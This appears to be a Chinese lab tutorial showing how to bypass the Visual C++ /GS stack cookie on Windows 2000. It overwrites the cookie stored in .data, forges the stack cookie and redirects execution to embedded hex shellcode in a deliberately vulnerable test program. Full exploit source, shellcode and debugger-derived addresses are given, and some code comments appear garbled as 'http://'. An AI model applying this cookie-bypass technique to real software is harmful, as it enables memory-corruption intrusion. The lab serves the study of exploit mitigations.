C++替換棧中和.data中的cookie實(shí)現(xiàn)步驟詳解
一、實(shí)驗(yàn)環(huán)境
操作系統(tǒng):Windows 2000 professional
軟件版本:原版OD(實(shí)時(shí)調(diào)試)、VS2008(release)
二、實(shí)驗(yàn)代碼
#include <stdafx.h> #include <string.h> #include <stdlib.h> /* char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; */ char shellcode[]= "\x90\x90\x90\x90"http://new value of cookie in .data "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" "\x53\xFF\x57\xFC\x53\xFF\x57\xF8" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xF4\x6F\x82\x90"http://result of \x90\x90\x90\x90 xor EBP "\x90\x90\x90\x90" "\x94\xFE\x12\x00"http://address of shellcode ; void test(char * str, int i, char * src) { char dest[200]; if(i<0x9995) { char * buf=str+i; *buf=*src; *(buf+1)=*(src+1); *(buf+2)=*(src+2); *(buf+3)=*(src+3); strcpy(dest,src); } } void main() { __asm int 3 char * str=(char *)malloc(0x10000); test(str,0xFFFF2FB8,shellcode); }
代碼分析:
(1)test函數(shù)會(huì)修改s+i到s+i+3(內(nèi)存地址)中保存的數(shù)據(jù);
(2)test函數(shù)中strcpy存在典型的溢出漏洞。
三、實(shí)驗(yàn)步驟
1、security cookie機(jī)制
直接運(yùn)行到if語句處;
產(chǎn)生:程序?qū)?x403000處保存的值,賦給EAX,將EAX與EBP異或,異或結(jié)果(security cookie)存儲(chǔ)在EAX中,然后將EAX中的值(也就是security cookie)保存在EBP-4處。
驗(yàn)證:程序從EBP-4處取出值,然后與EBP異或,最后將異或結(jié)果與0x00403000處的Cookie進(jìn)行比較,如果二者一致則校驗(yàn)通過,否則轉(zhuǎn)入校驗(yàn)失敗哦的異常處理。
同時(shí)可以看到security cookie存放在0x12FF60處。
現(xiàn)在的重點(diǎn)是:
- 將.data中保存的原cookie改為\x90\x90\x90\x90;
- 用\x90\x90\x90\x90與EBP的值進(jìn)行異或,并替換security cookie;
- 將test函數(shù)的返回地址改為shellcode的起始地址,帶程序返回時(shí),即可執(zhí)行shellcode.
2、獲取堆區(qū)起始地址
調(diào)試代碼:
#include <stdafx.h> #include <string.h> #include <stdlib.h> char shellcode[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; void test(char * str, int i, char * src) { char dest[200]; if(i<0x9995) { char * buf=str+i; *buf=*src; *(buf+1)=*(src+1); *(buf+2)=*(src+2); *(buf+3)=*(src+3); strcpy(dest,src); } } void main() { __asm int 3 char * str=(char *)malloc(0x10000); test(str,0xFFFF2FB8,shellcode); }
編譯,運(yùn)行完malloc函數(shù):
可見malloc獲取的堆區(qū)的起始地址為0x410048。
如何判斷堆區(qū)在哪兒呢?
- 單步跳過call語句,有些寄存器的值會(huì)變紅,說明執(zhí)行完這一函數(shù)后,寄存器中的值改變了,實(shí)在不會(huì),就將數(shù)據(jù)窗口依次跳到相應(yīng)位置。
- 需要多0x178這一偏移地址警惕,因?yàn)?x178在堆分配的時(shí)候,是空表索引freelist[0]的內(nèi)存地址;因?yàn)槎殉跏蓟臅r(shí)候,只有一個(gè)尾塊鏈在freelist[0]處的,且初次分配的時(shí)候是從尾塊前面“切”的,所以此處會(huì)出現(xiàn)0x390178.
故,可以斷定,0x410048為申請(qǐng)的空間的起始地址,也就是str的值。
3、修改.data中的原始cookie
查看.data在內(nèi)存中的起始地址;
可見.data在內(nèi)存中的起始地址為0x403000。
0x403000屬于低地址,0x410048屬于高地址,因?yàn)閕并沒有規(guī)定上限,因此只需將i設(shè)置為0xFFFF2FB8即可讓str指向0x403000。
可見,.data中的原cookie已經(jīng)被覆蓋。
4、查看棧區(qū)dest的起始地址
可以在OD中看到粗線部分,起始就是strcpy函數(shù)。可見起始地址為0x12FE94.
5、構(gòu)造shellcode
計(jì)算security cookie時(shí)的EBP為0x12FF64,.data存放的原cookie改為\x90\x90\x90\x90,偽造的security cookie就是0x90826FF4.
security cookie應(yīng)存放在0x12FF60,dest的起始地址為0x12FE94,所以shellcode可以這樣構(gòu)造:
將構(gòu)造好的shellcode復(fù)制到程序中,運(yùn)行:
strcpy之后,可見security cookie和test函數(shù)的返回地址都被覆蓋了!
F9運(yùn)行:
到此這篇關(guān)于C++替換棧中和.data中的cookie實(shí)現(xiàn)步驟詳解的文章就介紹到這了,更多相關(guān)C++替換棧中和.data中的cookie內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
OpenCV使用稀疏光流實(shí)現(xiàn)視頻對(duì)象跟蹤的方法詳解
這篇文章主要為大家詳細(xì)介紹了OpenCV如何使用稀疏光流實(shí)現(xiàn)視頻對(duì)象跟蹤功能,文中的示例代碼講解詳細(xì),具有一定的借鑒價(jià)值,需要的可以參考一下2023-02-02如何在C++中實(shí)現(xiàn)一個(gè)正確的時(shí)間循環(huán)器詳解
這篇文章主要給大家介紹了關(guān)于如何在C++中實(shí)現(xiàn)一個(gè)正確的時(shí)間循環(huán)器的相關(guān)資料,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧2020-10-10C語言實(shí)現(xiàn)括號(hào)配對(duì)的方法示例
本文主要介紹了C語言實(shí)現(xiàn)括號(hào)配對(duì)的方法示例,文中通過示例代碼介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2021-09-09C++?OpenCV紅綠燈檢測Demo實(shí)現(xiàn)詳解
OpenCV(Open Source Computer Vision Library)是開源的計(jì)算機(jī)視覺和機(jī)器學(xué)習(xí)庫,提供了C++、 C、 Python、 Java接口,并支持Windows、 Linux、 Android、 Mac OS平臺(tái),下面這篇文章主要給大家介紹了關(guān)于C++?OpenCV紅綠燈檢測Demo實(shí)現(xiàn)的相關(guān)資料,需要的朋友可以參考下2022-11-11C++ socket實(shí)現(xiàn)miniFTP
這篇文章主要為大家詳細(xì)介紹了C++ socket實(shí)現(xiàn)miniFTP的相關(guān)資料,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2016-11-11C++ CryptoPP使用AES實(shí)現(xiàn)加解密詳解
Crypto++ (CryptoPP) 是一個(gè)用于密碼學(xué)和加密的 C++ 庫,提供了大量的密碼學(xué)算法和功能,這篇文章主要為大家介紹了C++ CryptoPP如何使用AES實(shí)現(xiàn)加解密,需要的可以參考下2023-11-11Qt向ini文件寫入中文出現(xiàn)亂碼問題的解決方法詳解
這篇文章主要為大家詳細(xì)介紹了當(dāng)Qt向ini文件寫入中文出現(xiàn)亂碼問題時(shí)的解決方法,文中的示例代碼講解詳細(xì),感興趣的小伙伴可以跟隨小編一起學(xué)習(xí)一下2023-12-12